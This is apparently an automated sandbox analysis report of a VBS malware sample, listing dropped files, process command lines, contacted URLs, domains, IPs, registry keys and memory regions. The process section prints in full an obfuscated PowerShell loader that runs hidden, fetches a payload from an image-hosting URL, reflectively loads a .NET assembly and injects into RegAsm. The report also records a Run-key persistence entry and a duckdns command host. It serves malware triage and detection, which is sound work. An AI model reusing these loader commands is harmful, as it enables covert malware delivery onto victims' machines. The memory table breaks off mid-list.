Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
72625413524.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Name_File.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txt
|
Unicode text, UTF-8 text, with very long lines (11434), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11ldtlxc.acp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_extqx3t3.y0o.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb2iogtw.rhj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spsywtsd.5l0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w14w42uu.3wx.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreZQBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820',
'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' ,
'Name_File','RegAsm',''))} }"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://pantherropes.com/error/xwapri.txt
|
116.206.104.215
|
||
aprilxrwonew8450.duckdns.org
|
|||
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
|
172.67.215.45
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
https://paste.ee/d/FIwXaU
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://lesferch.github.io/DesktopPic
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://paste.ee/
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://paste.ee/d/FIwXa
|
172.67.187.200
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
||
https://oneget.org
|
unknown
|
||
https://paste.ee/d/FIwXaok
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
pantherropes.com
|
116.206.104.215
|
||
aprilxrwonew8450.duckdns.org
|
134.255.217.251
|
||
uploaddeimagens.com.br
|
172.67.215.45
|
||
paste.ee
|
172.67.187.200
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
134.255.217.251
|
aprilxrwonew8450.duckdns.org
|
Germany
|
||
116.206.104.215
|
pantherropes.com
|
Seychelles
|
||
172.67.215.45
|
uploaddeimagens.com.br
|
United States
|
||
172.67.187.200
|
paste.ee
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
402000
|
remote allocation
|
page execute and read and write
|
||
2C01000
|
trusted library allocation
|
page read and write
|
||
22ECD510000
|
heap
|
page read and write
|
||
510D000
|
trusted library allocation
|
page read and write
|
||
C833EFE000
|
stack
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
65BA000
|
heap
|
page read and write
|
||
FA7000
|
heap
|
page read and write
|
||
59FE000
|
stack
|
page read and write
|
||
5C85477000
|
stack
|
page read and write
|
||
22ECB720000
|
heap
|
page read and write
|
||
7FF848900000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1F580000
|
heap
|
page read and write
|
||
50EE000
|
trusted library allocation
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
22ECD591000
|
heap
|
page read and write
|
||
D4819FF000
|
stack
|
page read and write
|
||
E1B68FF000
|
stack
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
1C1C5CAA000
|
heap
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
2209A948000
|
heap
|
page read and write
|
||
7FF84884D000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1EC88000
|
heap
|
page read and write
|
||
2209C89F000
|
trusted library allocation
|
page read and write
|
||
2CC1CB30000
|
heap
|
page read and write
|
||
2CC1E9D3000
|
heap
|
page read and write
|
||
2CC1E9BB000
|
heap
|
page read and write
|
||
1C1AF03C000
|
trusted library allocation
|
page read and write
|
||
2790BC01000
|
trusted library allocation
|
page read and write
|
||
5C8517E000
|
stack
|
page read and write
|
||
2209A970000
|
heap
|
page read and write
|
||
D481DFE000
|
stack
|
page read and write
|
||
22ECD5B1000
|
heap
|
page read and write
|
||
2209CF88000
|
trusted library allocation
|
page read and write
|
||
22ECD5C9000
|
heap
|
page read and write
|
||
1C1AED14000
|
trusted library allocation
|
page read and write
|
||
2CC1ED07000
|
heap
|
page read and write
|
||
7FF848844000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
52CE000
|
stack
|
page read and write
|
||
27900001000
|
trusted library allocation
|
page read and write
|
||
27900A01000
|
trusted library allocation
|
page read and write
|
||
E1B61FE000
|
stack
|
page read and write
|
||
212E2D50000
|
heap
|
page read and write
|
||
7FF8489D1000
|
trusted library allocation
|
page read and write
|
||
212E2D40000
|
heap
|
page read and write
|
||
B6DC1F8000
|
stack
|
page read and write
|
||
2CC1F580000
|
heap
|
page read and write
|
||
2CC1F2A0000
|
heap
|
page read and write
|
||
7FF848A20000
|
trusted library allocation
|
page read and write
|
||
22ECD52C000
|
heap
|
page read and write
|
||
2CC1EBD0000
|
remote allocation
|
page read and write
|
||
220B4927000
|
heap
|
page execute and read and write
|
||
54EE000
|
stack
|
page read and write
|
||
F6A000
|
trusted library allocation
|
page execute and read and write
|
||
22ECD561000
|
heap
|
page read and write
|
||
2209A928000
|
heap
|
page read and write
|
||
2CC1F59A000
|
heap
|
page read and write
|
||
212E2CD0000
|
heap
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
2209A910000
|
heap
|
page read and write
|
||
2CC1F3A6000
|
heap
|
page read and write
|
||
22ECD6FC000
|
heap
|
page read and write
|
||
1C1ABB50000
|
heap
|
page read and write
|
||
692E000
|
unkown
|
page read and write
|
||
212E4BD6000
|
heap
|
page read and write
|
||
1C1C5CD0000
|
heap
|
page read and write
|
||
4C08000
|
trusted library allocation
|
page read and write
|
||
1C1AD6A0000
|
heap
|
page read and write
|
||
22ECD520000
|
heap
|
page read and write
|
||
22ECD52B000
|
heap
|
page read and write
|
||
C8339DE000
|
stack
|
page read and write
|
||
1168000
|
heap
|
page read and write
|
||
2CC1EA0D000
|
heap
|
page read and write
|
||
1070000
|
trusted library allocation
|
page read and write
|
||
7FF8489F1000
|
trusted library allocation
|
page read and write
|
||
22ECD516000
|
heap
|
page read and write
|
||
27901E01000
|
trusted library allocation
|
page read and write
|
||
212E667D000
|
heap
|
page read and write
|
||
212E2DF3000
|
heap
|
page read and write
|
||
F40000
|
trusted library allocation
|
page read and write
|
||
2CC1F4C6000
|
heap
|
page read and write
|
||
22ECB7BF000
|
heap
|
page read and write
|
||
212E2DF5000
|
heap
|
page read and write
|
||
2CC1F591000
|
heap
|
page read and write
|
||
22ECD54C000
|
heap
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
22ECD553000
|
heap
|
page read and write
|
||
7FF8488F6000
|
trusted library allocation
|
page read and write
|
||
212E4B30000
|
heap
|
page read and write
|
||
5C8567E000
|
stack
|
page read and write
|
||
2CC1EC7F000
|
heap
|
page read and write
|
||
2209A860000
|
heap
|
page read and write
|
||
58B9000
|
stack
|
page read and write
|
||
2CC1EC73000
|
heap
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
2209CCD0000
|
trusted library allocation
|
page read and write
|
||
212E2D4A000
|
heap
|
page read and write
|
||
22ECD520000
|
heap
|
page read and write
|
||
2CC1E9B9000
|
heap
|
page read and write
|
||
B6DC47E000
|
stack
|
page read and write
|
||
7FF8488D0000
|
trusted library allocation
|
page read and write
|
||
2CC1EBD0000
|
remote allocation
|
page read and write
|
||
C833953000
|
stack
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
2CC1ED20000
|
heap
|
page read and write
|
||
2CC1ECED000
|
heap
|
page read and write
|
||
2CC1E9B0000
|
heap
|
page read and write
|
||
212E2DEC000
|
heap
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page read and write
|
||
50E6000
|
trusted library allocation
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
7FF848A22000
|
trusted library allocation
|
page read and write
|
||
212E4B34000
|
heap
|
page read and write
|
||
2790B201000
|
trusted library allocation
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
212E2D5B000
|
heap
|
page read and write
|
||
2CC1CB10000
|
heap
|
page read and write
|
||
2CC1EC7F000
|
heap
|
page read and write
|
||
212E2D3C000
|
heap
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
51B0000
|
trusted library allocation
|
page execute and read and write
|
||
22ECB6F8000
|
heap
|
page read and write
|
||
212E4B96000
|
heap
|
page read and write
|
||
12E9000
|
trusted library allocation
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
2209C9A0000
|
trusted library allocation
|
page read and write
|
||
1C1ADA77000
|
heap
|
page execute and read and write
|
||
6617000
|
heap
|
page read and write
|
||
1C1ABD80000
|
trusted library allocation
|
page read and write
|
||
7FF848824000
|
trusted library allocation
|
page read and write
|
||
5C8577E000
|
stack
|
page read and write
|
||
22ECF0C0000
|
heap
|
page read and write
|
||
212E2DC2000
